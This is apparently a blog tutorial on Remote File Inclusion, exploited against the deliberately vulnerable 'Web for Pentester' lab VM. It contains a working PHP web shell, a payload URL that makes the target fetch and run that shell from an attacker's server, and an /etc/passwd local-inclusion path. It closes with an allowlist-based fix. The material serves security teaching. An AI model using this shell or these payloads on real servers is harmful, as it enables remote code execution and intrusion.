Remote File Inclusion [RFI]

HacksLand | The computer science playground

Posted by Thilan Dissanayaka on Aug 12, 2019

Remote File Inclusion (RFI) is a vulnerability in web applications that lets an attacker make the server fetch a script from a URL the attacker controls and execute it.

We use a Linux distribution called "Web for pen testers". You can download it from here. Now boot the virtual machine. You'll see a screen like this.

Yes, it is a Debian based OS with a lot of examples that demonstrate common vulnerabilities like command injection, SQL injection, cross-site scripting etc. An Apache server and MySQL are pre-installed on this machine.

Now use your web browser to browse to the VM's IP address. You can see the following web interface. Wow, there are many vulnerabilities to explore. There is plenty more to practice with on this VM.

In this tutorial we are going to focus on Remote File Inclusion. So let's select example1 of the File include category.

In the URL you can see a parameter named page, whose value is intro.php.
Now think about what it does. When example1.php is loaded, intro.php is automatically included and whatever is in that file is executed. Now let's see what actually happens under the hood.

Here you can see the source code of example1.php:

<?php require_once '../header.php'; ?>
<?php
        // The page name is taken straight from the query string and handed to
        // include() without any validation: this is the file inclusion bug.
        if ($_GET["page"]) {
                include($_GET["page"]);
        }
?>
<?php require_once '../footer.php'; ?>

There is something to notice. Did you see the two statements include and require_once? Both of them are used to insert another PHP script into the current file.

require (and require_once) gives a fatal error when the given file does not exist, so the current script stops executing.

include gives only a warning, and the rest of the script continues.

Now, in the above example1.php they have used include($_GET["page"]);.

In several places I have explained $_GET[]. Do you remember what it does? It fetches the URL parameter called page and passes it to the include function.

Now what if we could include a PHP web shell using this method? All we have to do is upload the shell to a server we control and give the shell's URL as the page parameter. Note that PHP only fetches a URL in include() when the allow_url_include setting is On (it has been Off by default since PHP 5.2); since the demonstration below succeeds, the VM has it enabled. I hope you got a clear idea of RFI. Let's see how we can do this practically.

In the above screenshot I logged into the VM and looked for files. Actually this step is not needed. Let's create a dummy PHP file for testing purposes.

Now I host that file on another VM and give the dummy file's URL as the input. Let's see what happens.

Wow, it is working.

Now let's build the actual PHP shell. In a previous tutorial I explained how to build a quick web shell. One thing to watch: host the shell on a server that serves it as plain text (for example a simple Python http.server), not on one that runs PHP, otherwise your own server executes the shell and the target only receives its output instead of the code.

<?php
// Runs whatever is in the cmd parameter on the target and shows the output, e.g.
// example1.php?page=http://<your-server>/shell.txt&cmd=id
echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
?>

Here you can see the final result.
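To close the loop, here is the fix, as an added example that is not part of the original post or of the Web for Pentester VM: the vulnerable include from example1.php next to a hardened version that only ever includes files from a fixed allowlist, plus a small check for whether remote inclusion is even possible on a given PHP build. The PAGES map, the about.php entry and the function names are assumptions made for the illustration; with this version the links would use page=intro instead of page=intro.php.

```php
<?php
// Added example (not from the original post or the VM). Contrasts the
// vulnerable include with an allowlist-based replacement.

// Vulnerable: whatever the client sends is handed to include(). With
// allow_url_include=On, page=http://attacker/shell.txt is fetched and executed
// (RFI); even with it Off, page=../../../etc/passwd still reads local files (LFI).
function include_page_vulnerable(): void
{
    if ($_GET["page"]) {
        include($_GET["page"]);
    }
}

// Hardened: the request value is used only as a key into a fixed map, so the
// file name itself never comes from the client. (Hypothetical map for the example.)
const PAGES = [
    'intro' => __DIR__ . '/intro.php',
    'about' => __DIR__ . '/about.php',
];

// Returns the file to include for a page name, or null if the name is unknown.
function resolve_page(string $name): ?string
{
    return PAGES[$name] ?? null;
}

function include_page_hardened(): void
{
    $name = $_GET['page'] ?? 'intro';
    $file = resolve_page($name);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $file;
}

// Defence in depth: keep "allow_url_include = Off" in php.ini regardless.
// ini_get() returns "1" when the setting is On and "0" or "" when Off.
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Usage (hypothetical): the body of example1.php would call the hardened version.
include_page_hardened();
```

The allowlist also closes the local file inclusion variant (page=../../../etc/passwd), since no path built from user input ever reaches include(). remote_include_enabled() is handy during an assessment: if it returns false, a page=http://... payload will fail even when the include itself is unsanitised.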


I hope you enjoyed the tutorial. Leave a comment if you need any tutorials on these topics. I'll try my best to write a post. :-)

Hi, I'm Thilan, an engineering student from Sri Lanka. I love to code with Python, JavaScript, PHP and C.
